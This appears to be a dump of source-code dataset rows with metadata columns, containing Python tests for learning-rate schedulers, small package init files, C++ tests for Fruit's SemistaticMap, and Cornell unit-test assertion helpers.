def test_polynomial_scheduler(*args, **kwargs):
    """Check that the polynomial LR scheduler converges to its configured end LR.

    Sweeps warmup settings x starting LRs, once for iteration-based
    scheduling (tight tolerance) and once for epoch-based scheduling
    (looser tolerance, since epoch-based adjustment is coarser).
    """
    opts = get_training_arguments(parse_args=True)
    setattr(opts, "scheduler.max_iterations", 100000)
    setattr(opts, "scheduler.name", "polynomial")

    num_iterations = getattr(opts, "scheduler.max_iterations", 100000)
    num_batches = DATASET_SIZE // BATCH_SIZE
    num_epochs = num_iterations // num_batches

    # Test for iteration-based samplers
    setattr(opts, "scheduler.is_iteration_based", True)
    _sweep_polynomial(opts, num_epochs, num_batches, LR_TOLERANCE, "iteration-based")

    # Test for epoch-based samplers
    setattr(opts, "scheduler.is_iteration_based", False)
    setattr(opts, "scheduler.max_epochs", num_epochs)
    setattr(opts, "scheduler.adjust_period_for_epochs", True)
    _sweep_polynomial(opts, num_epochs, num_batches, 1e-3, "epoch-based")


def _sweep_polynomial(opts, num_epochs, num_batches, tolerance, mode):
    """Run one warmup x start-LR sweep for the polynomial scheduler.

    For each combination, builds a scheduler with a random end LR strictly
    below the start LR, runs a full simulated training, and verifies the
    final LR is within *tolerance* of the configured end LR. *mode* is a
    label ("iteration-based"/"epoch-based") used in the summary log.
    """
    test_failed = 0
    test_passed = 0
    total_tests = 0
    failed_test_logs = []
    with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
        for warmup_iteration in WARMUP_ITERATIONS:
            setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
            for start_lr in MAX_LRS:
                # Random end LR in (start_lr/10, start_lr/2], rounded to 5 dp.
                end_lr = round(start_lr / random.randint(2, 10), 5)
                setattr(opts, "scheduler.polynomial.start_lr", start_lr)
                setattr(opts, "scheduler.polynomial.end_lr", end_lr)
                scheduler = build_scheduler(opts)
                lr = run_test(
                    scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
                )
                if abs(end_lr - lr) > tolerance:
                    failed_test_logs.append(
                        "Test failed for end_lr={}. Got={}".format(end_lr, lr)
                    )
                    test_failed += 1
                else:
                    test_passed += 1
                total_tests += 1
                # update the progress bar
                pbar.update(1)
    print("")
    if total_tests == test_passed:
        logger.log("All tests passed for {} polynomial scheduler".format(mode))
    else:
        logger.warning(
            "Tests passed={} and Tests failed={} for {} polynomial scheduler".format(
                test_passed, test_failed, mode
            )
        )
        pprint(failed_test_logs)
def test_cosine_scheduler(*args, **kwargs):
    """Check that the cosine LR scheduler anneals down to its configured min LR.

    Sweeps warmup settings x max LRs, once for iteration-based scheduling
    (tight tolerance) and once for epoch-based scheduling (looser
    tolerance, since epoch-based adjustment is coarser).
    """
    opts = get_training_arguments(parse_args=True)
    setattr(opts, "scheduler.max_iterations", 100000)
    setattr(opts, "scheduler.name", "cosine")

    num_iterations = getattr(opts, "scheduler.max_iterations", 100000)
    num_batches = DATASET_SIZE // BATCH_SIZE
    num_epochs = num_iterations // num_batches

    # first test for iteration-based samplers
    setattr(opts, "scheduler.is_iteration_based", True)
    _sweep_cosine(opts, num_epochs, num_batches, LR_TOLERANCE, "iteration-based")

    # Test for epoch-based samplers
    setattr(opts, "scheduler.is_iteration_based", False)
    setattr(opts, "scheduler.max_epochs", num_epochs)
    setattr(opts, "scheduler.adjust_period_for_epochs", True)
    _sweep_cosine(opts, num_epochs, num_batches, 1e-3, "epoch-based")


def _sweep_cosine(opts, num_epochs, num_batches, tolerance, mode):
    """Run one warmup x max-LR sweep for the cosine scheduler.

    For each combination, builds a scheduler with a random min LR strictly
    below the max LR, runs a full simulated training, and verifies the
    final LR is within *tolerance* of the configured min LR. *mode* is a
    label ("iteration-based"/"epoch-based") used in the summary log.
    """
    test_failed = 0
    test_passed = 0
    total_tests = 0
    failed_test_logs = []
    with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
        for warmup_iteration in WARMUP_ITERATIONS:
            setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
            for start_lr in MAX_LRS:
                # Random min LR in (start_lr/10, start_lr/2], rounded to 5 dp.
                end_lr = round(start_lr / random.randint(2, 10), 5)
                setattr(opts, "scheduler.cosine.max_lr", start_lr)
                setattr(opts, "scheduler.cosine.min_lr", end_lr)
                scheduler = build_scheduler(opts)
                lr = run_test(
                    scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
                )
                if abs(end_lr - lr) > tolerance:
                    failed_test_logs.append(
                        "Test failed for end_lr={}. Got={}".format(end_lr, lr)
                    )
                    test_failed += 1
                else:
                    test_passed += 1
                total_tests += 1
                # update the progress bar
                pbar.update(1)
    print("")
    if total_tests == test_passed:
        logger.log("All tests passed for {} cosine scheduler".format(mode))
    else:
        logger.warning(
            "Tests passed={} and Tests failed={} for {} cosine scheduler".format(
                test_passed, test_failed, mode
            )
        )
        pprint(failed_test_logs)
def test_fixed_scheduler(*args, **kwargs):
    """Check that the fixed LR scheduler ends at its configured constant LR.

    Sweeps warmup settings x LRs, once for iteration-based scheduling
    (tight tolerance) and once for epoch-based scheduling (looser
    tolerance, since epoch-based adjustment is coarser).
    """
    opts = get_training_arguments(parse_args=True)
    setattr(opts, "scheduler.max_iterations", 100000)
    setattr(opts, "scheduler.name", "fixed")

    num_iterations = getattr(opts, "scheduler.max_iterations", 100000)
    num_batches = DATASET_SIZE // BATCH_SIZE
    num_epochs = num_iterations // num_batches

    # Test for iteration-based samplers
    setattr(opts, "scheduler.is_iteration_based", True)
    _sweep_fixed(opts, num_epochs, num_batches, LR_TOLERANCE, "iteration-based")

    # Test for epoch-based samplers
    setattr(opts, "scheduler.is_iteration_based", False)
    setattr(opts, "scheduler.max_epochs", num_epochs)
    setattr(opts, "scheduler.adjust_period_for_epochs", True)
    _sweep_fixed(opts, num_epochs, num_batches, 1e-3, "epoch-based")


def _sweep_fixed(opts, num_epochs, num_batches, tolerance, mode):
    """Run one warmup x LR sweep for the fixed scheduler.

    For each combination, builds a scheduler with the given fixed LR, runs
    a full simulated training, and verifies the final LR is within
    *tolerance* of the configured LR. *mode* is a label
    ("iteration-based"/"epoch-based") used in the summary log.

    Note: the original iteration-based failure message mislabeled the
    fixed LR as "end_lr"; it now reports "lr={}. Got={}" consistently.
    """
    test_failed = 0
    test_passed = 0
    total_tests = 0
    failed_test_logs = []
    with tqdm(total=len(WARMUP_ITERATIONS) * len(MAX_LRS)) as pbar:
        for warmup_iteration in WARMUP_ITERATIONS:
            setattr(opts, "scheduler.warmup_iterations", warmup_iteration)
            for start_lr in MAX_LRS:
                setattr(opts, "scheduler.fixed.lr", start_lr)
                scheduler = build_scheduler(opts)
                lr = run_test(
                    scheduler=scheduler, num_epochs=num_epochs, num_batches=num_batches
                )
                if abs(start_lr - lr) > tolerance:
                    failed_test_logs.append(
                        "Test failed for lr={}. Got={}".format(start_lr, lr)
                    )
                    test_failed += 1
                else:
                    test_passed += 1
                total_tests += 1
                # update the progress bar
                pbar.update(1)
    print("")
    if total_tests == test_passed:
        logger.log("All tests passed for {} fixed scheduler".format(mode))
    else:
        logger.warning(
            "Tests passed={} and Tests failed={} for {} fixed scheduler".format(
                test_passed, test_failed, mode
            )
        )
        pprint(failed_test_logs)
def test_scheduler(*args, **kwargs):
    """Run the full LR-scheduler test suite: polynomial, cosine, then fixed."""
    suites = (
        ("Polynomial", test_polynomial_scheduler),
        ("Cosine", test_cosine_scheduler),
        ("fixed", test_fixed_scheduler),
    )
    for schedule_name, suite_fn in suites:
        logger.info("Running tests with {} schedule".format(schedule_name))
        suite_fn(*args, **kwargs)
        logger.double_dash_line()
# Run the whole scheduler test suite when this module is executed directly.
if __name__ == "__main__":
    test_scheduler()
| 36.384848
| 98
| 0.592155
| 1,397
| 12,007
| 4.84252
| 0.096636
| 0.071101
| 0.100517
| 0.020399
| 0.880414
| 0.867997
| 0.867997
| 0.862232
| 0.862232
| 0.862232
| 0
| 0.016887
| 0.319397
| 12,007
| 329
| 99
| 36.495441
| 0.81094
| 0.038478
| 0
| 0.713768
| 0
| 0
| 0.170209
| 0.067667
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018116
| false
| 0.130435
| 0.032609
| 0
| 0.054348
| 0.047101
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
3f2610204b2a11fc63eaacbc48199a38be50acb1
| 144
|
py
|
Python
|
appbundler/__init__.py
|
mab4058/appbundler
|
e1c3cb747ba3a23d517ec5ba73e26328845fa703
|
[
"MIT"
] | null | null | null |
appbundler/__init__.py
|
mab4058/appbundler
|
e1c3cb747ba3a23d517ec5ba73e26328845fa703
|
[
"MIT"
] | null | null | null |
appbundler/__init__.py
|
mab4058/appbundler
|
e1c3cb747ba3a23d517ec5ba73e26328845fa703
|
[
"MIT"
] | null | null | null |
from .__version__ import __version__
from .appbundler import AppBundler
from .appbundler import Config
from .appbundler import SupplementalData
| 28.8
| 40
| 0.861111
| 16
| 144
| 7.25
| 0.375
| 0.362069
| 0.517241
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 144
| 4
| 41
| 36
| 0.90625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
3f53f4581d01ca58b4285f339130830c9675143d
| 96
|
py
|
Python
|
stattools/datasets/__init__.py
|
artemmavrin/SLTools
|
04525b5d6777be3ccdc6ad44e4cbfe24a8875933
|
[
"MIT"
] | 2
|
2018-07-10T22:16:23.000Z
|
2019-10-08T00:12:44.000Z
|
stattools/datasets/__init__.py
|
artemmavrin/SLTools
|
04525b5d6777be3ccdc6ad44e4cbfe24a8875933
|
[
"MIT"
] | null | null | null |
stattools/datasets/__init__.py
|
artemmavrin/SLTools
|
04525b5d6777be3ccdc6ad44e4cbfe24a8875933
|
[
"MIT"
] | 4
|
2019-05-17T23:06:07.000Z
|
2021-03-22T14:04:24.000Z
|
"""Some small datasets."""
from .load import load_lsat_gpa
from .load import load_old_faithful
| 19.2
| 35
| 0.78125
| 15
| 96
| 4.733333
| 0.666667
| 0.225352
| 0.394366
| 0.507042
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 96
| 4
| 36
| 24
| 0.845238
| 0.208333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
3f67ef1cb9e1592edf7123de7afa8b5785777832
| 8,299
|
py
|
Python
|
tests/data_structures/test_semistatic_map.py
|
TinkerBoard-Android/external-google-fruit
|
57123c8a2477a4d99cb68c53d195e9fb428dd535
|
[
"Apache-2.0"
] | 1,666
|
2015-01-04T08:52:43.000Z
|
2022-03-28T11:06:19.000Z
|
tests/data_structures/test_semistatic_map.py
|
TinkerBoard-Android/external-google-fruit
|
57123c8a2477a4d99cb68c53d195e9fb428dd535
|
[
"Apache-2.0"
] | 135
|
2015-02-19T11:35:07.000Z
|
2022-03-29T05:00:42.000Z
|
tests/data_structures/test_semistatic_map.py
|
TinkerBoard-Android/external-google-fruit
|
57123c8a2477a4d99cb68c53d195e9fb428dd535
|
[
"Apache-2.0"
] | 253
|
2015-01-14T08:15:10.000Z
|
2022-03-24T07:49:53.000Z
|
#!/usr/bin/env python3
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
from fruit_test_common import *
# Shared C++ preamble prepended to every test snippet below: pulls in the
# semistatic_map implementation under test plus the std and fruit::impl
# namespaces.
COMMON_DEFINITIONS = '''
#include "test_common.h"
#define IN_FRUIT_CPP_FILE 1
#include <fruit/impl/data_structures/semistatic_map.templates.h>
using namespace std;
using namespace fruit::impl;
'''
class TestSemistaticMap(parameterized.TestCase):
def test_empty(self):
    """An empty SemistaticMap returns nullptr for every lookup (C++ snippet test)."""
    source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{};
SemistaticMap<int, std::string> map(values.begin(), values.end(), values.size(), memory_pool);
Assert(map.find(0) == nullptr);
Assert(map.find(2) == nullptr);
Assert(map.find(5) == nullptr);
}
'''
    # expect_success presumably compiles and runs the snippet with the shared
    # preamble; locals() supplies the snippet's local variables — confirm in
    # fruit_test_common.
    expect_success(
        COMMON_DEFINITIONS,
        source,
        locals())
def test_1_elem(self):
    """A single-entry SemistaticMap finds its key and misses all others (C++ snippet test)."""
    source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{2, "foo"}};
SemistaticMap<int, std::string> map(values.begin(), values.end(), values.size(), memory_pool);
Assert(map.find(0) == nullptr);
Assert(map.find(2) != nullptr);
Assert(map.at(2) == "foo");
Assert(map.find(5) == nullptr);
}
'''
    # expect_success presumably compiles and runs the snippet with the shared
    # preamble; locals() supplies the snippet's local variables — confirm in
    # fruit_test_common.
    expect_success(
        COMMON_DEFINITIONS,
        source,
        locals())
def test_1_inserted_elem(self):
    """Building a SemistaticMap from an empty map plus one inserted entry works (C++ snippet test)."""
    source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{};
SemistaticMap<int, std::string> old_map(values.begin(), values.end(), values.size(), memory_pool);
vector<pair<int, std::string>, ArenaAllocator<pair<int, std::string>>> new_values(
{{2, "bar"}},
ArenaAllocator<pair<int, std::string>>(memory_pool));
SemistaticMap<int, std::string> map(old_map, std::move(new_values));
Assert(map.find(0) == nullptr);
Assert(map.find(2) != nullptr);
Assert(map.at(2) == "bar");
Assert(map.find(5) == nullptr);
}
'''
    # expect_success presumably compiles and runs the snippet with the shared
    # preamble; locals() supplies the snippet's local variables — confirm in
    # fruit_test_common.
    expect_success(
        COMMON_DEFINITIONS,
        source,
        locals())
def test_3_elem(self):
    """A three-entry SemistaticMap finds all keys and misses absent ones (C++ snippet test)."""
    source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}, {3, "bar"}, {4, "baz"}};
SemistaticMap<int, std::string> map(values.begin(), values.end(), values.size(), memory_pool);
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
    # expect_success presumably compiles and runs the snippet with the shared
    # preamble; locals() supplies the snippet's local variables — confirm in
    # fruit_test_common.
    expect_success(
        COMMON_DEFINITIONS,
        source,
        locals())
def test_1_elem_2_inserted(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}};
SemistaticMap<int, std::string> old_map(values.begin(), values.end(), values.size(), memory_pool);
vector<pair<int, std::string>, ArenaAllocator<pair<int, std::string>>> new_values(
{{3, "bar"}, {4, "baz"}},
ArenaAllocator<pair<int, std::string>>(memory_pool));
SemistaticMap<int, std::string> map(old_map, std::move(new_values));
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_3_elem_3_inserted(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "1"}, {3, "3"}, {5, "5"}};
SemistaticMap<int, std::string> old_map(values.begin(), values.end(), values.size(), memory_pool);
vector<pair<int, std::string>, ArenaAllocator<pair<int, std::string>>> new_values(
{{2, "2"}, {4, "4"}, {16, "16"}},
ArenaAllocator<pair<int, std::string>>(memory_pool));
SemistaticMap<int, std::string> map(old_map, std::move(new_values));
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "1");
Assert(map.find(2) != nullptr);
Assert(map.at(2) == "2");
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "3");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "4");
Assert(map.find(5) != nullptr);
Assert(map.at(5) == "5");
Assert(map.find(6) == nullptr);
Assert(map.find(16) != nullptr);
Assert(map.at(16) == "16");
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_move_constructor(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}, {3, "bar"}, {4, "baz"}};
SemistaticMap<int, std::string> map1(values.begin(), values.end(), values.size(), memory_pool);
SemistaticMap<int, std::string> map = std::move(map1);
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
def test_move_assignment(self):
source = '''
int main() {
MemoryPool memory_pool;
vector<pair<int, std::string>> values{{1, "foo"}, {3, "bar"}, {4, "baz"}};
SemistaticMap<int, std::string> map1(values.begin(), values.end(), values.size(), memory_pool);
SemistaticMap<int, std::string> map;
map = std::move(map1);
Assert(map.find(0) == nullptr);
Assert(map.find(1) != nullptr);
Assert(map.at(1) == "foo");
Assert(map.find(2) == nullptr);
Assert(map.find(3) != nullptr);
Assert(map.at(3) == "bar");
Assert(map.find(4) != nullptr);
Assert(map.at(4) == "baz");
Assert(map.find(5) == nullptr);
}
'''
expect_success(
COMMON_DEFINITIONS,
source,
locals())
if __name__ == '__main__':
    # Bug fix: `absltest` was never imported (only `parameterized` is imported
    # at module scope), so running this file directly raised NameError.
    # Import it here, in the script entry point, where it is actually used.
    from absl.testing import absltest
    absltest.main()
| 38.24424
| 112
| 0.498373
| 891
| 8,299
| 4.547699
| 0.156004
| 0.135489
| 0.13154
| 0.088845
| 0.779862
| 0.773939
| 0.773939
| 0.773939
| 0.773939
| 0.735439
| 0
| 0.021964
| 0.34715
| 8,299
| 216
| 113
| 38.421296
| 0.725914
| 0.071454
| 0
| 0.744565
| 0
| 0.081522
| 0.811102
| 0.054732
| 0
| 0
| 0
| 0
| 0.331522
| 1
| 0.043478
| false
| 0
| 0.01087
| 0
| 0.059783
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58b7bbd64779424c3b4dc8b6f59680992279e01a
| 13,008
|
py
|
Python
|
cornelltest.py
|
JeffreyTsang/Brickbreaker
|
37f0d143e9f937027fc281aef1511d0e9c804b8b
|
[
"MIT"
] | null | null | null |
cornelltest.py
|
JeffreyTsang/Brickbreaker
|
37f0d143e9f937027fc281aef1511d0e9c804b8b
|
[
"MIT"
] | null | null | null |
cornelltest.py
|
JeffreyTsang/Brickbreaker
|
37f0d143e9f937027fc281aef1511d0e9c804b8b
|
[
"MIT"
] | null | null | null |
# cornelltest.py
# Walker M. White (wmw2), Lillian Lee (LJL2), Steve Marschner (srm2)
# August 20, 2015
"""Unit test support functions
This module provides function-level unit testing tools. It is a replacement for
the built-in Python package unittest, which is much less user friendly and requires
an understanding of OO programming.
The assert functions in this module are different from standard assert statements.
They stop execution of Python and report the location of the error."""
import numpy
import traceback
# STRING TYPE CHECKING
def isfloat(s):
    """**Returns**: True if s is the string representation of a number

    :param s: the candidate string to test
    **Precondition**: s is a string
    """
    # Only conversion failures mean "not a number".  The previous bare
    # `except:` also swallowed SystemExit/KeyboardInterrupt, and the converted
    # value was bound to an unused local.
    try:
        float(s)
        return True
    except (TypeError, ValueError):
        return False
def isint(s):
    """**Returns**: True if s is the string representation of an integer

    :param s: the candidate string to test
    **Precondition**: s is a string
    """
    # Only conversion failures mean "not an int".  The previous bare
    # `except:` also swallowed SystemExit/KeyboardInterrupt, and the converted
    # value was bound to an unused local.
    try:
        int(s)
        return True
    except (TypeError, ValueError):
        return False
def isbool(s):
    """Returns: True if s is the string representation of a boolean

    Only the exact strings 'True' and 'False' qualify; any non-string value
    (including actual bools) is rejected.

    :param s: the candidate string to test
    **Precondition**: s is a string
    """
    if type(s) is not str:
        return False
    return s in ('True', 'False')
# ASSERTION FUNCTIONS
def quit_with_error(msg):
    """Quit Python with an error msg

    When testing, this is preferable to raising an error in Python. Once you
    have a lot of helper functions, it becomes a lot of work just to figure out
    what is going on in the error message. This makes the error clear and concise

    :param msg: the error message to print before exiting
    """
    # Frame -3 is the caller of the assert_* helper that invoked us -- the
    # line the test author actually wants reported.
    stack = traceback.extract_stack()
    frame = stack[-3]
    # Bug fix: these were Python 2 `print` statements, which are a syntax
    # error under Python 3.  Single-argument `print(...)` calls behave
    # identically on both Python 2 and Python 3.
    print(msg)
    if frame[3] is None:
        suffix = ''
    else:
        suffix = ": " + frame[3]
    print('Line ' + repr(frame[1]) + ' of ' + frame[0] + suffix)
    print('Quitting with Error')
    quit()
def assert_equals(expected, received):
    """Quit if expected and received differ.

    :param expected: The value you expect the test to have
    :param received: The value the test actually had

    "Differ" here means `!=`, so this helper is unreliable for floats; use
    assert_floats_equal for those.  On failure it reports a message of the
    form:

        assert_equals expected 'yes' but instead got 'no'
    """
    if expected == received:
        return
    quit_with_error('assert_equals: expected ' + repr(expected) +
                    ' but instead got ' + repr(received))
def assert_not_equals(expected, received):
    """Quit if expected and received are the same.

    :param expected: The value you expect the test to have
    :param received: The value the test actually had

    The meaning of "same" for this function is ==. As a result, this
    assert function is not necessarily reliable when expected and received
    are of type "float". You should use the function assert_floats_not_equal
    for that application.

    As part of the error message, this function provides some minimal
    debug information. The following is an example debug message:

        assert_not_equals expected something different from 'n'
    """
    if expected == received:
        # Bug fix: the message previously lacked the space after "from",
        # producing e.g. "different from'n'" (contradicting the docstring).
        message = ('assert_not_equals: expected something different from ' +
                   repr(expected))
        quit_with_error(message)
def assert_true(received):
    """Quit if received is False.

    :param received: The value the test actually had

    On failure the debug message reads:

        assert_true expected True but instead got False
    """
    if received:
        return
    quit_with_error("assert_true: expected True but instead got False")
def assert_false(received):
    """Quit AssertionError if received is True.

    :param received: The value the test actually had

    On failure the debug message reads:

        assert_false expected False but instead got True
    """
    if not received:
        return
    quit_with_error("assert_false: expected False but instead got True")
def assert_floats_equal(expected, received):
    """Quit if floats expected and received differ.

    :param expected: The value you expect the test to have
    **Precondition**: the value must be a float
    :param received: The value the test actually had
    **Precondition**: the value must be a float

    Comparison is delegated to numpy.allclose, so two values count as equal
    when they are "close enough" rather than exactly `==`.  Example failure
    message:

        assert_floats_equal: expected 0.1 but instead got 0.2

    If either argument is not an int or float the function quits with a
    different message, e.g.:

        assert_floats_equal: first argument 'alas' is not a number
    """
    # Validate both arguments before comparing; booleans pass because
    # bool is not in this tuple but type() is an exact check.
    for position, value in (("first", expected), ("second", received)):
        if type(value) not in (float, int):
            quit_with_error("assert_floats_equal: " + position +
                            " argument " + repr(value) + " is not a number")
    if not numpy.allclose([expected], [received]):
        quit_with_error("assert_floats_equal: expected " + repr(expected) +
                        " but instead got " + repr(received))
def assert_floats_not_equal(expected, received):
    """Quit if floats expected and received are the same.

    :param expected: The value you expect the test to have
    **Precondition**: the value must be a float
    :param received: The value the test actually had
    **Precondition**: the value must be a float

    This function takes two numbers and compares them using functions
    from the numerical package numpy. This is a scientific computing
    package that allows us to test if numbers are "close enough".
    Hence, unlike assert_not_equals, the meaning of "same" for this
    function is however it is defined by numpy.

    As part of the error message, this function provides some minimal
    debug information. The following is an example debug message:

        assert_floats_not_equal: expected something different from 0.1
    """
    number = [float, int]  # list of number types
    if type(expected) not in number:
        msg = ('assert_floats_not_equal: ' +
               'first argument ' + repr(expected) + ' is not a number')
        quit_with_error(msg)
    if type(received) not in number:
        msg = ("assert_floats_not_equal: " +
               "second argument " + repr(received) + " is not a number")
        quit_with_error(msg)
    if numpy.allclose([expected], [received]):
        # Bug fix: message previously lacked the space after "from",
        # producing "different from0.1" (contradicting the docstring).
        msg = ('assert_floats_not_equal: expected something different from ' +
               repr(expected))
        quit_with_error(msg)
def assert_float_lists_equal(expected, received):
    """Quit if the lists of floats expected and received differ

    :param expected: The value you expect the test to have
    **Precondition**: the value must be a multidimensional list of int or float
    :param received: The value the test actually had
    **Precondition**: the value must be a multidimensional list of int or float

    Comparison is delegated to numpy.allclose, so elements count as equal
    when they are "close enough".  The lists may be multidimensional but must
    have exactly the same dimensions.  Example failure message:

        assert_float_lists_equal: expected [[1,2],[3,4]] but instead got [[1,2],[3,5]]
    """
    # (Removed an unused `number` local left over from the scalar variants.)
    if type(expected) != list:
        msg = ("assert_float_lists_equal: " +
               "first argument " + repr(expected) + " is not a list")
        quit_with_error(msg)
    if type(received) != list:
        msg = ("assert_float_lists_equal: " +
               "second argument " + repr(received) + " is not a list")
        quit_with_error(msg)
    if len(expected) != len(received):
        msg = ('assert_float_lists_equal: lists ' + repr(expected) +
               ' and ' + repr(received) + ' have different sizes')
        quit_with_error(msg)
    # Bug fix: only the numpy comparison goes in the try.  Previously
    # quit_with_error was called *inside* a bare `except:` scope, so the
    # SystemExit it raises was caught and a second, misleading "not
    # comparable" error was printed after the real one.
    try:
        close = numpy.allclose([expected], [received])
    except Exception:
        msg = ('assert_float_lists_equal: lists ' + repr(expected) +
               ' and ' + repr(received) + ' are not comparable')
        quit_with_error(msg)
    if not close:
        msg = ("assert_float_lists_equal: expected " + repr(expected) +
               " but instead got " + repr(received))
        quit_with_error(msg)
def assert_float_lists_not_equal(expected, received):
    """Quit if the lists of floats expected and received are the same

    :param expected: The value you expect the test to have
    **Precondition**: the value must be a multidimensional list of int or float
    :param received: The value the test actually had
    **Precondition**: the value must be a multidimensional list of int or float

    Comparison is delegated to numpy.allclose, so elements count as equal
    when they are "close enough".  The lists may be multidimensional but must
    have exactly the same dimensions.  Example failure messages:

        assert_float_lists_not_equal: expected something different from [[1,2],[3,4]]
        assert_float_lists_not_equal: first argument 'alas' is not a list
        assert_float_lists_not_equal: lists [1] and [2,3] are not comparable
    """
    # (Removed an unused `number` local left over from the scalar variants.)
    if type(expected) != list:
        msg = ("assert_float_lists_not_equal: " +
               "first argument " + repr(expected) + " is not a list")
        quit_with_error(msg)
    if type(received) != list:
        msg = ("assert_float_lists_not_equal: " +
               "second argument " + repr(received) + " is not a list")
        quit_with_error(msg)
    if len(expected) != len(received):
        # Bug fix: message previously named assert_float_lists_equal
        # (copy-paste from the sibling function).
        msg = ('assert_float_lists_not_equal: lists ' + repr(expected) +
               ' and ' + repr(received) + ' have different sizes')
        quit_with_error(msg)
    # Bug fix: only the numpy comparison goes in the try.  Previously a bare
    # `except:` wrapped the quit_with_error call as well, so the SystemExit
    # raised by quit() was caught and a second, misleading "not comparable"
    # error was printed after the real one.
    try:
        close = numpy.allclose([expected], [received])
    except Exception:
        msg = ('assert_float_lists_not_equal: lists ' + repr(expected) +
               ' and ' + repr(received) + ' are not comparable')
        quit_with_error(msg)
    if close:
        # Bug fixes: message previously named assert_floats_not_equal and
        # lacked the space after "from" (see the docstring example).
        msg = ('assert_float_lists_not_equal: expected something different from ' +
               repr(expected))
        quit_with_error(msg)
| 37.704348
| 100
| 0.652675
| 1,733
| 13,008
| 4.810156
| 0.124639
| 0.023752
| 0.03275
| 0.036468
| 0.861324
| 0.853167
| 0.836012
| 0.81406
| 0.763076
| 0.744842
| 0
| 0.003719
| 0.276445
| 13,008
| 345
| 101
| 37.704348
| 0.881959
| 0.017066
| 0
| 0.638655
| 0
| 0
| 0.232472
| 0.068873
| 0
| 0
| 0
| 0
| 0.235294
| 0
| null | null | 0
| 0.016807
| null | null | 0.02521
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
58e58a3dbbe9af64219d4b94431e463fd2160fe7
| 1,514
|
py
|
Python
|
tests/features/test_sqlserver.py
|
alexgarzao/beeweb
|
c67d024c2d43c6bb2da7ba6877c1648e8760f036
|
[
"MIT"
] | 5
|
2017-11-10T12:48:10.000Z
|
